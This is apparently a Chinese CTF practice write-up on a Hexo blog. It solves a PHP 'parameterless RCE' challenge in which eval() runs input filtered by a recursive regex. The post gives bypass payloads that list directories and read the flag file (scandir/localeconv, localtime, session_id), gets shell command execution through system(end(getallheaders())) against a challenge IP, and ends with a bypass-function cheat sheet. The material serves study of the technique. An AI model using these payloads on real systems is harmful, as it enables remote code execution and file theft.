<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.14.0/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"-181.github.io","root":"/","scheme":"Mist","version":"8.0.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}};
  </script>

  <meta name="description" content="title:无参数RCE date:2020-11-01 tags:练习无参数RCE题目分析题目源码：  eval函数：php的任意代码执行 GET传参，传入code参数，如果code经过正则匹配与“；”相等，就会执行eval，所以我们要看如何绕过正则，正则匹配到 &#x2F;[^\W]+\((?R)?\)&#x2F;  ，它会替换为空 ‘ ‘，然后会等于分号 ‘;’，（例如：?code&#x3D;echo();">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="https://-181.github.io/2020/11/01/%E6%97%A0%E5%8F%82%E6%95%B0RCE/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="title:无参数RCE date:2020-11-01 tags:练习无参数RCE题目分析题目源码：  eval函数：php的任意代码执行 GET传参，传入code参数，如果code经过正则匹配与“；”相等，就会执行eval，所以我们要看如何绕过正则，正则匹配到 &#x2F;[^\W]+\((?R)?\)&#x2F;  ，它会替换为空 ‘ ‘，然后会等于分号 ‘;’，（例如：?code&#x3D;echo();">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/ls/1.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/ls/echo.jpg">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/ls/123.jpg">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/ls/.1.jpg">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/ls/adc13908ac2db0a22fc88c1e5cb73e8.jpg">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/ls/%E6%9F%A5%E7%9C%8B%E9%A1%B5%E9%9D%A2%E6%BA%90%E4%BB%A3%E7%A0%81.jpg">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/ls/7288f39189fe8f53a82b16bc792b6f6.jpg">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/ls/ls.jpg">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/ls/cat.jpg">
<meta property="article:published_time" content="2020-10-31T17:22:13.702Z">
<meta property="article:modified_time" content="2020-11-27T14:53:31.861Z">
<meta property="article:author" content="lisa">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zhuang-yongyi.gitee.io/yoyo/ls/1.png">


<link rel="canonical" href="https://-181.github.io/2020/11/01/%E6%97%A0%E5%8F%82%E6%95%B0RCE/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title> | Hexo</title>
  






  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Hexo</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>







</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <section class="post-toc-wrap sidebar-panel">
          <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#tags-%E7%BB%83%E4%B9%A0"><span class="nav-number">1.</span> <span class="nav-text">tags:练习</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%97%A0%E5%8F%82%E6%95%B0RCE"><span class="nav-number">2.</span> <span class="nav-text">无参数RCE</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90"><span class="nav-number">2.1.</span> <span class="nav-text">题目分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9E%84%E9%80%A0%E7%82%B9"><span class="nav-number">2.2.</span> <span class="nav-text">构造点</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#localeconv"><span class="nav-number">2.2.0.1.</span> <span class="nav-text">localeconv()</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#localtime"><span class="nav-number">2.2.0.2.</span> <span class="nav-text">localtime()</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#SESSIONID"><span class="nav-number">2.2.0.3.</span> <span class="nav-text">SESSIONID</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#getallheaders"><span class="nav-number">2.2.0.4.</span> <span class="nav-text">getallheaders()</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">2.3.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></div>
      </section>
      <!--/noindex-->

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">lisa</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">6</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </section>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">
      

      

  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://-181.github.io/2020/11/01/%E6%97%A0%E5%8F%82%E6%95%B0RCE/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="lisa">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2020-11-01 01:22:13" itemprop="dateCreated datePublished" datetime="2020-11-01T01:22:13+08:00">2020-11-01</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">Edited on</span>
        <time title="Modified: 2020-11-27 22:53:31" itemprop="dateModified" datetime="2020-11-27T22:53:31+08:00">2020-11-27</time>
      </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <hr>
<p>title:无参数RCE</p>
<p>date:2020-11-01</p>
<h2 id="tags-练习"><a href="#tags-练习" class="headerlink" title="tags:练习"></a>tags:练习</h2><h2 id="无参数RCE"><a href="#无参数RCE" class="headerlink" title="无参数RCE"></a>无参数RCE</h2><h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><p>题目源码：</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/ls/1.png"></p>
<p>eval函数：php的任意代码执行</p>
<p>GET传参，传入code参数，如果code经过正则匹配与“；”相等，就会执行eval，所以我们要看如何绕过正则，正则匹配到 <code>/[^\W]+\((?R)?\)/</code>  ，它会替换为空 ‘ ‘，然后会等于分号 ‘;’，（例如：?code=echo();      ?传参code，传入echo()，被替换为空的话，就等于分号）如果等于分号，就会绕过这个正则。</p>
<p>正则中，\W：表示a-z、A-Z，数字，下划线。(?R)是引用当前表达式的意思，即可以用\w+((?R)?)替换到(?R)的位置，(?R)? 这里多一个?表示可以有引用，也就是说可以衍生匹配。</p>
<p><code>/[^\W]+\((?R)?\)/</code>，只匹配<code>字符串+()</code>的类型，并且括号内为空字符串仅可以由26个小写字母组成。</p>
<p>如：$code=”echo();”;   传入一个code是echo()，经过这个正则把它匹配到的东西替换为空，如图：</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/ls/echo.jpg"></p>
<p>嵌套也可以被匹配，然后替换为空，如：echo(phpinfo());</p>
<p>同上，输出：；</p>
<p>而如果在这个参数中输入123，echo(123)，就不能匹配了：</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/ls/123.jpg"></p>
<p>题目的意思，就是我们传入的参数，要符合函数嵌套的形式，才能绕过这个正则，然后利用echo(phpinfo());去读取flag，传入eval中</p>
<p>那么现在就要想办法利用这种形式，以读取flag。</p>
<p>可以通过读取网站的目录，看看目录有没有flag，用以下函数可以读取目录：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">var_dump(scandir(&#39;.&#39;));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>如图，读取了目录</p>
<p>如果目录中有flag，那我们就可以读取flag，将下面方框中的tp5改为flag.php</p>
<p><img src=""></p>
<p>但是有一个问题，就是scandir这个函数含有字符”.“，而前面讲过，不能含有字符，否则正则无法被匹配。</p>
<p>那么，就要构造这个点。</p>
<h3 id="构造点"><a href="#构造点" class="headerlink" title="构造点"></a>构造点</h3><h5 id="localeconv"><a href="#localeconv" class="headerlink" title="localeconv()"></a>localeconv()</h5><p>localeconv()会返回当地的金融信息的数组，其第一个元素即为点。pos():取第一个元素</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">var_dump(pos(localeconv()));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>结合scandir：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">var_dump(scandir(pos(localeconv())));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>如图：</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/ls/.1.jpg"></p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/ls/adc13908ac2db0a22fc88c1e5cb73e8.jpg"></p>
<p>end函数：</p>
<p>读取数组中的最后一个元素，并输出</p>
<p>此处数组中含多个元素，而flag文件位于最后，因此使用end，只读取flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">var_dump(end(scandir(pos(localeconv()))));</span><br></pre></td></tr></table></figure>

<p>readfile函数：读取flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">var_dump(readfile(end(scandir(pos(localeconv())))));</span><br></pre></td></tr></table></figure>

<p>输入网址，查看页面源代码</p>
<p>如图：</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/ls/%E6%9F%A5%E7%9C%8B%E9%A1%B5%E9%9D%A2%E6%BA%90%E4%BB%A3%E7%A0%81.jpg"></p>
<h5 id="localtime"><a href="#localtime" class="headerlink" title="localtime()"></a>localtime()</h5><p>利用当前秒数构造点 ，localtime()中第46秒在Allsc码表中为点。</p>
<p>缺点：较为麻烦，需等到46秒才能构造出点</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">var_dump(chr(pos(localtime())));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>结合scandir：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">var_dump(readfile(end(scandir(chr(pos(localtime()))))));</span><br></pre></td></tr></table></figure>



<h5 id="SESSIONID"><a href="#SESSIONID" class="headerlink" title="SESSIONID"></a>SESSIONID</h5><p>用session来传参，读取文件名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show_source(session_id(session_start()));</span><br></pre></td></tr></table></figure>

<p>需要抓包，在cookie出传参：</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/ls/7288f39189fe8f53a82b16bc792b6f6.jpg"></p>
<h5 id="getallheaders"><a href="#getallheaders" class="headerlink" title="getallheaders()"></a>getallheaders()</h5><p>end读取请求头的最后一条信息，然后传入system</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo(system(end(getallheaders()))); </span><br></pre></td></tr></table></figure>

<p>输入网址：<a target="_blank" rel="noopener" href="http://47.98.234.232:28085/code.php?code=echo(system(end(getallheaders()">http://47.98.234.232:28085/code.php?code=echo(system(end(getallheaders()</a>))); </p>
<p>然后抓包</p>
<p>在最后一行输入ls，显示会返回flag.php</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/ls/ls.jpg"></p>
<p>于是再将ls改为cat flag.php，就可以读取flag了</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/ls/cat.jpg"></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">getchwd() 函数返回当前工作目录。</span><br><span class="line">array_reverse() 以相反的元素顺序返回数组</span><br><span class="line">scandir() 函数返回指定目录中的文件和目录的数组。</span><br><span class="line">dirname() 函数返回路径中的目录部分。</span><br><span class="line">chdir()   函数改变当前的目录。</span><br><span class="line">localeconv() 返回当地金融信息，其中包含了点</span><br><span class="line">readfile()   输出一个文件</span><br><span class="line">chr(pos(localtime())) 利用当前秒数构造点    </span><br><span class="line">current()    返回数组中的当前单元, 默认取第一个值</span><br><span class="line">pos()      current() 的别名</span><br><span class="line">next()     函数将内部指针指向数组中的下一个元素，并输出。</span><br><span class="line">end()      将内部指针指向数组中的最后一个元素，并输出。</span><br><span class="line">array_rand()   函数返回数组中的随机键名，或者如果您规定函数返回不只一个键名，则返回包含随机 键名的数组。 </span><br><span class="line">array_flip()   函数用于反转&#x2F;交换数组中所有的键名以及它们关联的键值。</span><br><span class="line">chr()  函数从指定的 ASCII 值返回字符。</span><br><span class="line">hex2bin()  转换十六进制字符串为二进制字符串</span><br><span class="line">getenv()   获取一个环境变量的值(在7.1之后可以不给予参数)</span><br><span class="line">show_source() 高亮读取文件</span><br><span class="line">highlight_file() 高亮读取文件</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/10/31/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" rel="prev" title="">
                  <i class="fa fa-chevron-left"></i> 
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2020/11/18/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E9%A2%98%EF%BC%88python%E8%84%9A%E6%9C%AC%EF%BC%89/" rel="next" title="">
                   <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






      

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

    </div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
      

      

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lisa</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/mist/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a>
  </div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.0/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  


















  








  

  

</body>
</html>
